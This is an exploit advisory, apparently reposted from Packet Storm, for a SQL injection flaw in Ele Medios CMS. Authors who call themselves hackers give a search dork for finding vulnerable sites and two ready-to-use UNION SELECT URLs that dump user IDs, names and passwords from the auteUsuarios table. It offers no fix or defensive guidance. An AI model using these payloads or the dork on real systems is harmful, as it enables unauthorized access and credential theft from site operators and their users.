Ele Medios CMS suffers from a remote SQL injection vulnerability.
49bcc9237c752ebb9a649805e0dc412c3b97de160f4b02a36796c3e11442a4e0
view source
print?
ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] Ele Medios CMS SQL Injection Vulnerability
[!] Author : Dr.0rYX and Cr3w-DZ
[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de
***************************************************************************/
[ Software Information ]
[+] Vendor : http://www.elemedios.net/
[+] script : Ele Medios CMS
[+] Download : http://www.elemedios.net/
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"noticias.php?notiId="
**************************************************************************/
[ Vulnerable File ]
http://server/noticias.php?notiId=[N.A.S.T ]
[ Exploit ]
http://server/noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+from+auteUsuarios
http://server/noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+8+from+auteUsuarios
[ GReets ]
[+] :claw , le0n , exploit-db.com , ALL HACKERS MUSLIMS
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed